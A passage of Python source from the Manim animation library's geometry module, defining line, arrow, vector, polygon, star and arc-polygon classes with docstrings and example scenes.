dashed_2 = DashedLine(config.left_side, config.right_side)
# positive_space_ratio decreased
dashed_3 = DashedLine(config.left_side, config.right_side, positive_space_ratio=0.1).shift(DOWN*2)
self.add(dashed_1, dashed_2, dashed_3)
See Also
--------
:class:`~.DashedVMobject`
"""
def __init__(
self,
*args,
dash_length=DEFAULT_DASH_LENGTH,
dash_spacing=None,
positive_space_ratio=0.5,
**kwargs,
):
self.dash_length = dash_length
self.dash_spacing = (dash_spacing,)
self.positive_space_ratio = positive_space_ratio
super().__init__(*args, **kwargs)
dashes = DashedVMobject(
self,
num_dashes=self.calculate_num_dashes(),
positive_space_ratio=positive_space_ratio,
)
self.clear_points()
self.add(*dashes)
def calculate_num_dashes(self) -> int:
"""Returns the number of dashes in the dashed line.
Examples
--------
::
>>> DashedLine().calculate_num_dashes()
20
"""
try:
full_length = self.dash_length / self.positive_space_ratio
return int(np.ceil(self.get_length() / full_length))
except ZeroDivisionError:
return 1
def calculate_positive_space_ratio(self):
return fdiv(self.dash_length, self.dash_length + self.dash_spacing)
def get_start(self) -> np.ndarray:
"""Returns the start point of the line.
Examples
--------
::
>>> DashedLine().get_start()
array([-1., 0., 0.])
"""
if len(self.submobjects) > 0:
return self.submobjects[0].get_start()
else:
return Line.get_start(self)
def get_end(self) -> np.ndarray:
"""Returns the end point of the line.
Examples
--------
::
>>> DashedLine().get_end()
array([0.99871795, 0. , 0. ])
"""
if len(self.submobjects) > 0:
return self.submobjects[-1].get_end()
else:
return super().get_end()
def get_first_handle(self) -> np.ndarray:
"""Returns the point of the first handle.
Examples
--------
::
>>> DashedLine().get_first_handle()
array([-0.98333333, 0. , 0. ])
"""
return self.submobjects[0].get_points()[1]
def get_last_handle(self) -> np.ndarray:
"""Returns the point of the last handle.
Examples
--------
::
>>> DashedLine().get_last_handle()
array([0.98205128, 0. , 0. ])
"""
return self.submobjects[-1].get_points()[-2]
class TangentLine(Line):
"""Constructs a line tangent to a :class:`~.VMobject` at a specific point.
Parameters
----------
vmob : :class:`~.VMobject`
The VMobject on which the tangent line is drawn.
alpha : :class:`float`
How far along the shape that the line will be constructed. range: 0-1.
length : :class:`float`, optional
Length of the tangent line.
d_alpha: :class:`float`, optional
The ``dx`` value
kwargs : Any
Additional arguments to be passed to :class:`Line`
Examples
--------
.. manim:: TangentLineExample
:save_last_frame:
class TangentLineExample(Scene):
def construct(self):
circle = Circle(radius=2)
line_1 = TangentLine(circle, alpha=0.0, length=4, color=BLUE_D) # right
line_2 = TangentLine(circle, alpha=0.4, length=4, color=GREEN) # top left
self.add(circle, line_1, line_2)
See Also
--------
:meth:`~.VMobject.point_from_proportion`
"""
def __init__(self, vmob, alpha, length=1, d_alpha=1e-6, **kwargs):
self.length = length
self.d_alpha = d_alpha
da = self.d_alpha
a1 = np.clip(alpha - da, 0, 1)
a2 = np.clip(alpha + da, 0, 1)
super().__init__(
vmob.point_from_proportion(a1), vmob.point_from_proportion(a2), **kwargs
)
self.scale(self.length / self.get_length())
class Elbow(VMobject, metaclass=ConvertToOpenGL):
"""Two lines that create a right angle about each other: L-shape.
Parameters
----------
width : :class:`float`, optional
The length of the elbow's sides.
angle : :class:`float`, optional
The rotation of the elbow.
kwargs : Any
Additional arguments to be passed to :class:`~.VMobject`
Examples
--------
.. manim:: ElbowExample
:save_last_frame:
class ElbowExample(Scene):
def construct(self):
elbow_1 = Elbow()
elbow_2 = Elbow(width=2.0)
elbow_3 = Elbow(width=2.0, angle=5*PI/4)
elbow_group = Group(elbow_1, elbow_2, elbow_3).arrange(buff=1)
self.add(elbow_group)
See Also
--------
:class:`RightAngle`
"""
def __init__(self, width=0.2, angle=0, **kwargs):
self.angle = angle
super().__init__(**kwargs)
self.set_points_as_corners([UP, UP + RIGHT, RIGHT])
self.scale_to_fit_width(width, about_point=ORIGIN)
self.rotate(self.angle, about_point=ORIGIN)
class Arrow(Line):
"""An arrow.
Parameters
----------
args : Any
Arguments to be passed to :class:`Line`.
stroke_width : :class:`float`, optional
The thickness of the arrow. Influenced by :attr:`max_stroke_width_to_length_ratio`.
buff : :class:`float`, optional
The distance of the arrow from its start and end points.
max_tip_length_to_length_ratio : :class:`float`, optional
:attr:`tip_length` scales with the length of the arrow. Increasing this ratio raises the max value of :attr:`tip_length`.
max_stroke_width_to_length_ratio : :class:`float`, optional
:attr:`stroke_width` scales with the length of the arrow. Increasing this ratio ratios the max value of :attr:`stroke_width`.
kwargs : Any
Additional arguments to be passed to :class:`Line`.
Examples
--------
.. manim:: ArrowExample
:save_last_frame:
from manim.mobject.geometry import ArrowSquareTip
class ArrowExample(Scene):
def construct(self):
arrow_1 = Arrow(start=RIGHT, end=LEFT, color=GOLD)
arrow_2 = Arrow(start=RIGHT, end=LEFT, color=GOLD, tip_shape=ArrowSquareTip).shift(DOWN)
g1 = Group(arrow_1, arrow_2)
# the effect of buff
square = Square(color=MAROON_A)
arrow_3 = Arrow(start=LEFT, end=RIGHT)
arrow_4 = Arrow(start=LEFT, end=RIGHT, buff=0).next_to(arrow_1, UP)
g2 = Group(arrow_3, arrow_4, square)
# a shorter arrow has a shorter tip and smaller stroke width
arrow_5 = Arrow(start=ORIGIN, end=config.top).shift(LEFT * 4)
arrow_6 = Arrow(start=config.top + DOWN, end=config.top).shift(LEFT * 3)
g3 = Group(arrow_5, arrow_6)
self.add(Group(g1, g2, g3).arrange(buff=2))
.. manim:: ArrowExample
:save_last_frame:
class ArrowExample(Scene):
def construct(self):
left_group = VGroup()
# As buff increases, the size of the arrow decreases.
for buff in np.arange(0, 2.2, 0.45):
left_group += Arrow(buff=buff, start=2 * LEFT, end=2 * RIGHT)
# Required to arrange arrows.
left_group.arrange(DOWN)
left_group.move_to(4 * LEFT)
middle_group = VGroup()
# As max_stroke_width_to_length_ratio gets bigger,
# the width of stroke increases.
for i in np.arange(0, 5, 0.5):
middle_group += Arrow(max_stroke_width_to_length_ratio=i)
middle_group.arrange(DOWN)
UR_group = VGroup()
# As max_tip_length_to_length_ratio increases,
# the length of the tip increases.
for i in np.arange(0, 0.3, 0.1):
UR_group += Arrow(max_tip_length_to_length_ratio=i)
UR_group.arrange(DOWN)
UR_group.move_to(4 * RIGHT + 2 * UP)
DR_group = VGroup()
DR_group += Arrow(start=LEFT, end=RIGHT, color=BLUE, tip_shape=ArrowSquareTip)
DR_group += Arrow(start=LEFT, end=RIGHT, color=BLUE, tip_shape=ArrowSquareFilledTip)
DR_group += Arrow(start=LEFT, end=RIGHT, color=YELLOW, tip_shape=ArrowCircleTip)
DR_group += Arrow(start=LEFT, end=RIGHT, color=YELLOW, tip_shape=ArrowCircleFilledTip)
DR_group.arrange(DOWN)
DR_group.move_to(4 * RIGHT + 2 * DOWN)
self.add(left_group, middle_group, UR_group, DR_group)
See Also
--------
:class:`ArrowTip`
:class:`CurvedArrow`
"""
def __init__(
self,
*args,
stroke_width=6,
buff=MED_SMALL_BUFF,
max_tip_length_to_length_ratio=0.25,
max_stroke_width_to_length_ratio=5,
**kwargs,
):
self.max_tip_length_to_length_ratio = max_tip_length_to_length_ratio
self.max_stroke_width_to_length_ratio = max_stroke_width_to_length_ratio
tip_shape = kwargs.pop("tip_shape", ArrowTriangleFilledTip)
super().__init__(*args, buff=buff, stroke_width=stroke_width, **kwargs)
# TODO, should this be affected when
# Arrow.set_stroke is called?
self.initial_stroke_width = self.stroke_width
self.add_tip(tip_shape=tip_shape)
self.set_stroke_width_from_length()
def scale(self, factor, scale_tips=False, **kwargs):
r"""Scale an arrow, but keep stroke width and arrow tip size fixed.
See Also
--------
:meth:`~.Mobject.scale`
Examples
--------
::
>>> arrow = Arrow(np.array([-1, -1, 0]), np.array([1, 1, 0]), buff=0)
>>> scaled_arrow = arrow.scale(2)
>>> np.round(scaled_arrow.get_start_and_end(), 8) + 0
array([[-2., -2., 0.],
[ 2., 2., 0.]])
>>> arrow.tip.length == scaled_arrow.tip.length
True
Manually scaling the object using the default method
:meth:`~.Mobject.scale` does not have the same properties::
>>> new_arrow = Arrow(np.array([-1, -1, 0]), np.array([1, 1, 0]), buff=0)
>>> another_scaled_arrow = VMobject.scale(new_arrow, 2)
>>> another_scaled_arrow.tip.length == arrow.tip.length
False
"""
if self.get_length() == 0:
return self
if scale_tips:
super().scale(factor, **kwargs)
self.set_stroke_width_from_length()
return self
has_tip = self.has_tip()
has_start_tip = self.has_start_tip()
if has_tip or has_start_tip:
old_tips = self.pop_tips()
super().scale(factor, **kwargs)
self.set_stroke_width_from_length()
if has_tip:
self.add_tip(tip=old_tips[0])
if has_start_tip:
self.add_tip(tip=old_tips[1], at_start=True)
return self
def get_normal_vector(self) -> np.ndarray:
"""Returns the normal of a vector.
Examples
--------
::
>>> Arrow().get_normal_vector() + 0. # add 0. to avoid negative 0 in output
array([ 0., 0., -1.])
"""
p0, p1, p2 = self.tip.get_start_anchors()[:3]
return normalize(np.cross(p2 - p1, p1 - p0))
def reset_normal_vector(self):
"""Resets the normal of a vector"""
self.normal_vector = self.get_normal_vector()
return self
def get_default_tip_length(self) -> float:
"""Returns the default tip_length of the arrow.
Examples
--------
::
>>> Arrow().get_default_tip_length()
0.35
"""
max_ratio = self.max_tip_length_to_length_ratio
return min(self.tip_length, max_ratio * self.get_length())
def set_stroke_width_from_length(self):
"""Used internally. Sets stroke width based on length."""
max_ratio = self.max_stroke_width_to_length_ratio
if config.renderer == "opengl":
self.set_stroke(
width=min(self.initial_stroke_width, max_ratio * self.get_length()),
recurse=False,
)
else:
self.set_stroke(
width=min(self.initial_stroke_width, max_ratio * self.get_length()),
family=False,
)
return self
class Vector(Arrow):
"""A vector specialized for use in graphs.
Parameters
----------
direction : Union[:class:`list`, :class:`numpy.ndarray`]
The direction of the arrow.
buff : :class:`float`
The distance of the vector from its endpoints.
kwargs : Any
Additional arguments to be passed to :class:`Arrow`
Examples
--------
.. manim:: VectorExample
:save_last_frame:
class VectorExample(Scene):
def construct(self):
plane = NumberPlane()
vector_1 = Vector([1,2])
vector_2 = Vector([-5,-2])
self.add(plane, vector_1, vector_2)
"""
def __init__(self, direction=RIGHT, buff=0, **kwargs):
self.buff = buff
if len(direction) == 2:
direction = np.hstack([direction, 0])
super().__init__(ORIGIN, direction, buff=buff, **kwargs)
def coordinate_label(
self, integer_labels: bool = True, n_dim: int = 2, color: str = WHITE
):
"""Creates a label based on the coordinates of the vector.
Parameters
----------
integer_labels
Whether or not to round the coordinates to integers.
n_dim
The number of dimensions of the vector.
color
The color of the label.
Examples
--------
.. manim VectorCoordinateLabel
:save_last_frame:
class VectorCoordinateLabel(Scene):
def construct(self):
plane = NumberPlane()
vect_1 = Vector([1, 2])
vect_2 = Vector([-3, -2])
label_1 = vect1.coordinate_label()
label_2 = vect2.coordinate_label(color=YELLOW)
self.add(plane, vect_1, vect_2, label_1, label_2)
"""
# avoiding circular imports
from .matrix import Matrix
vect = np.array(self.get_end())
if integer_labels:
vect = np.round(vect).astype(int)
vect = vect[:n_dim]
vect = vect.reshape((n_dim, 1))
label = Matrix(vect)
label.scale(LARGE_BUFF - 0.2)
shift_dir = np.array(self.get_end())
if shift_dir[0] >= 0: # Pointing right
shift_dir -= label.get_left() + DEFAULT_MOBJECT_TO_MOBJECT_BUFFER * LEFT
else: # Pointing left
shift_dir -= label.get_right() + DEFAULT_MOBJECT_TO_MOBJECT_BUFFER * RIGHT
label.shift(shift_dir)
label.set_color(color)
return label
class DoubleArrow(Arrow):
"""An arrow with tips on both ends.
Parameters
----------
args : Any
Arguments to be passed to :class:`Arrow`
kwargs : Any
Additional arguments to be passed to :class:`Arrow`
Examples
--------
.. manim:: DoubleArrowExample
:save_last_frame:
from manim.mobject.geometry import ArrowCircleFilledTip
class DoubleArrowExample(Scene):
def construct(self):
circle = Circle(radius=2.0)
d_arrow = DoubleArrow(start=circle.get_left(), end=circle.get_right())
d_arrow_2 = DoubleArrow(tip_shape_end=ArrowCircleFilledTip, tip_shape_start=ArrowCircleFilledTip)
group = Group(Group(circle, d_arrow), d_arrow_2).arrange(UP, buff=1)
self.add(group)
.. manim:: DoubleArrowExample2
:save_last_frame:
class DoubleArrowExample2(Scene):
def construct(self):
box = Square()
p1 = box.get_left()
p2 = box.get_right()
d1 = DoubleArrow(p1, p2, buff=0)
d2 = DoubleArrow(p1, p2, buff=0, tip_length=0.2, color=YELLOW)
d3 = DoubleArrow(p1, p2, buff=0, tip_length=0.4, color=BLUE)
Group(d1, d2, d3).arrange(DOWN)
self.add(box, d1, d2, d3)
See Also
--------
:class:`ArrowTip`
:class:`CurvedDoubleArrow`
"""
def __init__(self, *args, **kwargs):
if "tip_shape_end" in kwargs:
kwargs["tip_shape"] = kwargs.pop("tip_shape_end")
tip_shape_start = kwargs.pop("tip_shape_start", ArrowTriangleFilledTip)
super().__init__(*args, **kwargs)
self.add_tip(at_start=True, tip_shape=tip_shape_start)
class CubicBezier(VMobject, metaclass=ConvertToOpenGL):
"""
Example
-------
.. manim:: BezierSplineExample
:save_last_frame:
class BezierSplineExample(Scene):
def construct(self):
p1 = np.array([-3, 1, 0])
p1b = p1 + [1, 0, 0]
d1 = Dot(point=p1).set_color(BLUE)
l1 = Line(p1, p1b)
p2 = np.array([3, -1, 0])
p2b = p2 - [1, 0, 0]
d2 = Dot(point=p2).set_color(RED)
l2 = Line(p2, p2b)
bezier = CubicBezier(p1b, p1b + 3 * RIGHT, p2b - 3 * RIGHT, p2b)
self.add(l1, d1, l2, d2, bezier)
"""
def __init__(self, start_anchor, start_handle, end_handle, end_anchor, **kwargs):
super().__init__(**kwargs)
self.add_cubic_bezier_curve(start_anchor, start_handle, end_handle, end_anchor)
class Polygram(VMobject, metaclass=ConvertToOpenGL):
"""A generalized :class:`Polygon`, allowing for disconnected sets of edges.
Parameters
----------
vertex_groups
The groups of vertices making up the :class:`Polygram`.
The first vertex in each group is repeated to close the shape.
Each point must be 3-dimensional: ``[x,y,z]``
color
The color of the :class:`Polygram`.
kwargs
Forwarded to the parent constructor.
Examples
--------
.. manim:: PolygramExample
import numpy as np
class PolygramExample(Scene):
def construct(self):
hexagram = Polygram(
[[0, 2, 0], [-np.sqrt(3), -1, 0], [np.sqrt(3), -1, 0]],
[[-np.sqrt(3), 1, 0], [0, -2, 0], [np.sqrt(3), 1, 0]],
)
self.add(hexagram)
dot = Dot()
self.play(MoveAlongPath(dot, hexagram), run_time=5, rate_func=linear)
self.remove(dot)
self.wait()
"""
def __init__(self, *vertex_groups: Iterable[Sequence[float]], color=BLUE, **kwargs):
super().__init__(color=color, **kwargs)
for vertices in vertex_groups:
first_vertex, *vertices = vertices
first_vertex = np.array(first_vertex)
self.start_new_path(first_vertex)
self.add_points_as_corners(
[*[np.array(vertex) for vertex in vertices], first_vertex]
)
def get_vertices(self) -> np.ndarray:
"""Gets the vertices of the :class:`Polygram`.
Returns
-------
:class:`numpy.ndarray`
The vertices of the :class:`Polygram`.
Examples
--------
::
>>> sq = Square()
>>> sq.get_vertices()
array([[ 1., 1., 0.],
[-1., 1., 0.],
[-1., -1., 0.],
[ 1., -1., 0.]])
"""
return self.get_start_anchors()
def get_vertex_groups(self) -> np.ndarray:
"""Gets the vertex groups of the :class:`Polygram`.
Returns
-------
:class:`numpy.ndarray`
The vertex groups of the :class:`Polygram`.
Examples
--------
::
>>> poly = Polygram([ORIGIN, RIGHT, UP], [LEFT, LEFT + UP, 2 * LEFT])
>>> poly.get_vertex_groups()
array([[[ 0., 0., 0.],
[ 1., 0., 0.],
[ 0., 1., 0.]],
<BLANKLINE>
[[-1., 0., 0.],
[-1., 1., 0.],
[-2., 0., 0.]]])
"""
vertex_groups = []
group = []
for start, end in zip(self.get_start_anchors(), self.get_end_anchors()):
group.append(start)
if self.consider_points_equals(end, group[0]):
vertex_groups.append(group)
group = []
return np.array(vertex_groups)
def round_corners(self, radius: float = 0.5):
"""Rounds off the corners of the :class:`Polygram`.
Parameters
----------
radius
The curvature of the corners of the :class:`Polygram`.
Examples
--------
.. manim:: PolygramRoundCorners
:save_last_frame:
class PolygramRoundCorners(Scene):
def construct(self):
star = Star(outer_radius=2)
shapes = VGroup(star)
shapes.add(star.copy().round_corners(radius=0.1))
shapes.add(star.copy().round_corners(radius=0.25))
shapes.arrange(RIGHT)
self.add(shapes)
See Also
--------
:class:`RoundedRectangle`
"""
if radius == 0:
return self
new_points = []
for vertices in self.get_vertex_groups():
arcs = []
for v1, v2, v3 in adjacent_n_tuples(vertices, 3):
vect1 = v2 - v1
vect2 = v3 - v2
unit_vect1 = normalize(vect1)
unit_vect2 = normalize(vect2)
angle = angle_between_vectors(vect1, vect2)
# Negative radius gives concave curves
angle *= np.sign(radius)
# Distance between vertex and start of the arc
cut_off_length = radius * np.tan(angle / 2)
# Determines counterclockwise vs. clockwise
sign = np.sign(np.cross(vect1, vect2)[2])
arc = ArcBetweenPoints(
v2 - unit_vect1 * cut_off_length,
v2 + unit_vect2 * cut_off_length,
angle=sign * angle,
)
arcs.append(arc)
# To ensure that we loop through starting with last
arcs = [arcs[-1], *arcs[:-1]]
for arc1, arc2 in adjacent_pairs(arcs):
new_points.extend(arc1.get_points())
line = Line(arc1.get_end(), arc2.get_start())
# Make sure anchors are evenly distributed
len_ratio = line.get_length() / arc1.get_arc_length()
line.insert_n_curves(int(arc1.get_num_curves() * len_ratio))
new_points.extend(line.get_points())
self.set_points(new_points)
return self
class Polygon(Polygram):
"""A shape consisting of one closed loop of vertices.
Parameters
----------
vertices
The vertices of the :class:`Polygon`.
kwargs
Forwarded to the parent constructor.
Examples
--------
.. manim:: PolygonExample
:save_last_frame:
class PolygonExample(Scene):
def construct(self):
isosceles = Polygon([-5, 1.5, 0], [-2, 1.5, 0], [-3.5, -2, 0])
position_list = [
[4, 1, 0], # middle right
[4, -2.5, 0], # bottom right
[0, -2.5, 0], # bottom left
[0, 3, 0], # top left
[2, 1, 0], # middle
[4, 3, 0], # top right
]
square_and_triangles = Polygon(*position_list, color=PURPLE_B)
self.add(isosceles, square_and_triangles)
"""
def __init__(self, *vertices: Sequence[float], **kwargs):
super().__init__(vertices, **kwargs)
class RegularPolygram(Polygram):
"""A :class:`Polygram` with regularly spaced vertices.
Parameters
----------
num_vertices
The number of vertices.
density
The density of the :class:`RegularPolygram`.
Can be thought of as how many vertices to hop
to draw a line between them. Every ``density``-th
vertex is connected.
radius
The radius of the circle that the vertices are placed on.
start_angle
The angle the vertices start at; the rotation of
the :class:`RegularPolygram`.
kwargs
Forwarded to the parent constructor.
Examples
--------
.. manim:: RegularPolygramExample
:save_last_frame:
class RegularPolygramExample(Scene):
def construct(self):
pentagram = RegularPolygram(5, radius=2)
self.add(pentagram)
"""
def __init__(
self,
num_vertices: int,
*,
density: int = 2,
radius: float = 1,
start_angle: Optional[float] = None,
**kwargs,
):
# Regular polygrams can be expressed by the number of their vertices
# and their density. This relation can be expressed as its Schläfli
# symbol: {num_vertices/density}.
#
# For instance, a pentagon can be expressed as {5/1} or just {5}.
# A pentagram, however, can be expressed as {5/2}.
# A hexagram *would* be expressed as {6/2}, except that 6 and 2
# are not coprime, and it can be simplified to 2{3}, which corresponds
# to the fact that a hexagram is actually made up of 2 triangles.
#
# See https://en.wikipedia.org/wiki/Polygram_(geometry)#Generalized_regular_polygons
# for more information.
num_gons = np.gcd(num_vertices, density)
num_vertices //= num_gons
density //= num_gons
# Utility function for generating the individual
# polygon vertices.
def gen_polygon_vertices(start_angle):
reg_vertices, start_angle = regular_vertices(
num_vertices, radius=radius, start_angle=start_angle
)
vertices = []
i = 0
while True:
vertices.append(reg_vertices[i])
i += density
i %= num_vertices
if i == 0:
break
return vertices, start_angle
first_group, self.start_angle = gen_polygon_vertices(start_angle)
vertex_groups = [first_group]
for i in range(1, num_gons):
start_angle = self.start_angle + (i / num_gons) * TAU / num_vertices
group, _ = gen_polygon_vertices(start_angle)
vertex_groups.append(group)
super().__init__(*vertex_groups, **kwargs)
class RegularPolygon(RegularPolygram):
"""An n-sided regular :class:`Polygon`.
Parameters
----------
n
The number of sides of the :class:`RegularPolygon`.
kwargs
Forwarded to the parent constructor.
Examples
--------
.. manim:: RegularPolygonExample
:save_last_frame:
class RegularPolygonExample(Scene):
def construct(self):
poly_1 = RegularPolygon(n=6)
poly_2 = RegularPolygon(n=6, start_angle=30*DEGREES, color=GREEN)
poly_3 = RegularPolygon(n=10, color=RED)
poly_group = Group(poly_1, poly_2, poly_3).scale(1.5).arrange(buff=1)
self.add(poly_group)
"""
def __init__(self, n: int = 6, **kwargs):
super().__init__(n, density=1, **kwargs)
class Star(Polygon):
"""A regular polygram without the intersecting lines.
Parameters
----------
n
How many points on the :class:`Star`.
outer_radius
The radius of the circle that the outer vertices are placed on.
inner_radius
The radius of the circle that the inner vertices are placed on.
If unspecified, the inner radius will be
calculated such that the edges of the :class:`Star`
perfectly follow the edges of its :class:`RegularPolygram`
counterpart.
density
The density of the :class:`Star`. Only used if
``inner_radius`` is unspecified.
See :class:`RegularPolygram` for more information.
start_angle
The angle the vertices start at; the rotation of
the :class:`Star`.
kwargs
Forwardeds to the parent constructor.
Raises
------
:exc:`ValueError`
If ``inner_radius`` is unspecified and ``density``
is not in the range ``[1, n/2)``.
Examples
--------
.. manim:: StarExample
:save_as_gif:
class StarExample(Scene):
def construct(self):
pentagram = RegularPolygram(5, radius=2)
star = Star(outer_radius=2, color=RED)
self.add(pentagram)
self.play(Create(star), run_time=3)
self.play(FadeOut(star), run_time=2)
.. manim:: DifferentDensitiesExample
:save_last_frame:
class DifferentDensitiesExample(Scene):
def construct(self):
density_2 = Star(7, outer_radius=2, density=2, color=RED)
density_3 = Star(7, outer_radius=2, density=3, color=PURPLE)
self.add(VGroup(density_2, density_3).arrange(RIGHT))
"""
def __init__(
self,
n: int = 5,
*,
outer_radius: float = 1,
inner_radius: Optional[float] = None,
density: int = 2,
start_angle: Optional[float] = TAU / 4,
**kwargs,
):
inner_angle = TAU / (2 * n)
if inner_radius is None:
# See https://math.stackexchange.com/a/2136292 for an
# overview of how to calculate the inner radius of a
# perfect star.
if density <= 0 or density >= n / 2:
raise ValueError(
f"Incompatible density {density} for number of points {n}"
)
outer_angle = TAU * density / n
inverse_x = 1 - np.tan(inner_angle) * (
(np.cos(outer_angle) - 1) / np.sin(outer_angle)
)
inner_radius = outer_radius / (np.cos(inner_angle) * inverse_x)
outer_vertices, self.start_angle = regular_vertices(
n, radius=outer_radius, start_angle=start_angle
)
inner_vertices, _ = regular_vertices(
n, radius=inner_radius, start_angle=self.start_angle + inner_angle
)
vertices = []
for pair in zip(outer_vertices, inner_vertices):
vertices.extend(pair)
super().__init__(*vertices, **kwargs)
class ArcPolygon(VMobject, metaclass=ConvertToOpenGL):
"""A generalized polygon allowing for points to be connected with arcs.
This version tries to stick close to the way :class:`Polygon` is used. Points
can be passed to it directly which are used to generate the according arcs
(using :class:`ArcBetweenPoints`). An angle or radius can be passed to it to
use across all arcs, but to configure arcs individually an ``arc_config`` list
has to be passed with the syntax explained below.
.. tip::
Two instances of :class:`ArcPolygon` can be transformed properly into one
another as well. Be advised that any arc initialized with ``angle=0``
will actually be a straight line, so if a straight section should seamlessly
transform into an arced section or vice versa, initialize the straight section
with a negligible angle instead (such as ``angle=0.0001``).
There is an alternative version (:class:`ArcPolygonFromArcs`) that is instantiated
with pre-defined arcs.
See Also
--------
:class:`ArcPolygonFromArcs`
Parameters
----------
vertices : Union[:class:`list`, :class:`np.array`]
A list of vertices, start and end points for the arc segments.
angle : :class:`float`
The angle used for constructing the arcs. If no other parameters
are set, this angle is used to construct all arcs.
radius : Optional[:class:`float`]
The circle radius used to construct the arcs. If specified,
overrides the specified ``angle``.
arc_config : Optional[Union[List[:class:`dict`]], :class:`dict`]
When passing a ``dict``, its content will be passed as keyword
arguments to :class:`~.ArcBetweenPoints`. Otherwise, a list
of dictionaries containing values that are passed as keyword
arguments for every individual arc can be passed.
kwargs
Further keyword arguments that are passed to the constructor of
:class:`~.VMobject`.
Attributes
----------
arcs : :class:`list`
The arcs created from the input parameters::
>>> from manim import ArcPolygon
>>> ap = ArcPolygon([0, 0, 0], [2, 0, 0], [0, 2, 0])
>>> ap.arcs
[ArcBetweenPoints, ArcBetweenPoints, ArcBetweenPoints]
Examples
--------
.. manim:: SeveralArcPolygons
class SeveralArcPolygons(Scene):
def construct(self):
a = [0, 0, 0]
b = [2, 0, 0]
c = [0, 2, 0]
ap1 = ArcPolygon(a, b, c, radius=2)
ap2 = ArcPolygon(a, b, c, angle=45*DEGREES)
ap3 = ArcPolygon(a, b, c, arc_config={'radius': 1.7, 'color': RED})
ap4 = ArcPolygon(a, b, c, color=RED, fill_opacity=1,
arc_config=[{'radius': 1.7, 'color': RED},
{'angle': 20*DEGREES, 'color': BLUE},
{'radius': 1}])
ap_group = VGroup(ap1, ap2, ap3, ap4).arrange()
self.play(*[Create(ap) for ap in [ap1, ap2, ap3, ap4]])
self.wait()
For further examples see :class:`ArcPolygonFromArcs`.
"""
def __init__(self, *vertices, angle=PI / 4, radius=None, arc_config=None, **kwargs):
n = len(vertices)
point_pairs = [(vertices[k], vertices[(k + 1) % n]) for k in range(n)]
if not arc_config:
if radius:
all_arc_configs = [{"radius": radius} for pair in point_pairs]
else:
all_arc_configs = [{"angle": angle} for pair in point_pairs]
elif isinstance(arc_config, dict):
all_arc_configs = [arc_config for pair in point_pairs]
else:
assert len(arc_config) == n
all_arc_configs = arc_config
arcs = [
ArcBetweenPoints(*pair, **conf)
for (pair, conf) in zip(point_pairs, all_arc_configs)
]
super().__init__(**kwargs)
# Adding the arcs like this makes ArcPolygon double as a VGroup.
# Also makes changes to the ArcPolygon, such as scaling, affect
# the arcs, so that their new values are usable.
self.add(*arcs)
for arc in arcs:
self.append_points(arc.get_points())
# This enables the use of ArcPolygon.arcs as a convenience
# because ArcPolygon[0] returns itself, not the first Arc.
self.arcs = arcs
class ArcPolygonFromArcs(VMobject, metaclass=ConvertToOpenGL):
"""A generalized polygon allowing for points to be connected with arcs.
This version takes in pre-defined arcs to generate the arcpolygon and introduces
little new syntax. However unlike :class:`Polygon` it can't be created with points
directly.
For proper appearance the passed arcs should connect seamlessly:
``[a,b][b,c][c,a]``
If there are any gaps between the arcs, those will be filled in
with straight lines, which can be used deliberately for any straight
sections. Arcs can also be passed as straight lines such as an arc
initialized with ``angle=0``.
.. tip::
Two instances of :class:`ArcPolygon` can be transformed properly into
one another as well. Be advised that any arc initialized with ``angle=0``
will actually be a straight line, so if a straight section should seamlessly
transform into an arced section or vice versa, initialize the straight
section with a negligible angle instead (such as ``angle=0.0001``).
There is an alternative version (:class:`ArcPolygon`) that can be instantiated
with points.
See Also
--------
:class:`ArcPolygon`
Parameters
----------
arcs : Union[:class:`Arc`, :class:`ArcBetweenPoints`]
These are the arcs from which the arcpolygon is assembled.
kwargs
Keyword arguments that are passed to the constructor of
:class:`~.VMobject`. Affects how the ArcPolygon itself is drawn,
but doesn't affect passed arcs.
Attributes
----------
arcs : :class:`list`
The arcs used to initialize the ArcPolygonFromArcs::
>>> from manim import ArcPolygonFromArcs, Arc, ArcBetweenPoints
>>> ap = ArcPolygonFromArcs(Arc(), ArcBetweenPoints([1,0,0], [0,1,0]), Arc())
>>> ap.arcs
[Arc, ArcBetweenPoints, Arc]
Examples
--------
One example of an arcpolygon is the Reuleaux triangle.
Instead of 3 straight lines connecting the outer points,
a Reuleaux triangle has 3 arcs connecting those points,
making a shape with constant width.
Passed arcs are stored as submobjects in the arcpolygon.
This means that the arcs are changed along with the arcpolygon,
for example when it's shifted, and these arcs can be manipulated
after the arcpolygon has been initialized.
Also both the arcs contained in an :class:`~.ArcPolygonFromArcs`, as well as the
arcpolygon itself are drawn, which affects draw time in :class:`~.Create`
for example. In most cases the arcs themselves don't
need to be drawn, in which case they can be passed as invisible.
.. manim:: ArcPolygonExample
class ArcPolygonExample(Scene):
def construct(self):
arc_conf = {"stroke_width": 0}
poly_conf = {"stroke_width": 10, "stroke_color": BLUE,
"fill_opacity": 1, "color": PURPLE}
a = [-1, 0, 0]
b = [1, 0, 0]
c = [0, np.sqrt(3), 0]
arc0 = ArcBetweenPoints(a, b, radius=2, **arc_conf)
arc1 = ArcBetweenPoints(b, c, radius=2, **arc_conf)
arc2 = ArcBetweenPoints(c, a, radius=2, **arc_conf)
reuleaux_tri = ArcPolygonFromArcs(arc0, arc1, arc2, **poly_conf)
self.play(FadeIn(reuleaux_tri))
self.wait(2)
The arcpolygon itself can also be hidden so that instead only the contained
arcs are drawn. This can be used to easily debug arcs or to highlight them.
.. manim:: ArcPolygonExample2
class ArcPolygonExample2(Scene):
def construct(self):
arc_conf = {"stroke_width": 3, "stroke_color": BLUE,
"fill_opacity": 0.5, "color": GREEN}
poly_conf = {"color": None}
a = [-1, 0, 0]
b = [1, 0, 0]
c = [0, np.sqrt(3), 0]
arc0 = ArcBetweenPoints(a, b, radius=2, **arc_conf)
arc1 = ArcBetweenPoints(b, c, radius=2, **arc_conf)
arc2 = ArcBetweenPoints(c, a, radius=2, stroke_color=RED)
reuleaux_tri = ArcPolygonFromArcs(arc0, arc1, arc2, **poly_conf)
self.play(FadeIn(reuleaux_tri))
self.wait(2)
"""
def __init__(self, *arcs, **kwargs):
if not all(isinstance(m, (Arc, ArcBetweenPoints)) for m in arcs):
raise ValueError(
"All ArcPolygon submobjects must be of type Arc/ArcBetweenPoints"
)
super().__init__(**kwargs)
# Adding the arcs like this makes ArcPolygonFromArcs double as a VGroup.
# Also makes changes to the ArcPolygonFromArcs, such as scaling, affect
# the arcs, so that their new values are usable.
self.add(*arcs)
# This enables the use of ArcPolygonFromArcs.arcs as a convenience
# because ArcPolygonFromArcs[0] returns itself, not the first Arc.
self.arcs = [*arcs]
for arc1, arc2 in adjacent_pairs(arcs):
self.append_points(arc1.points)
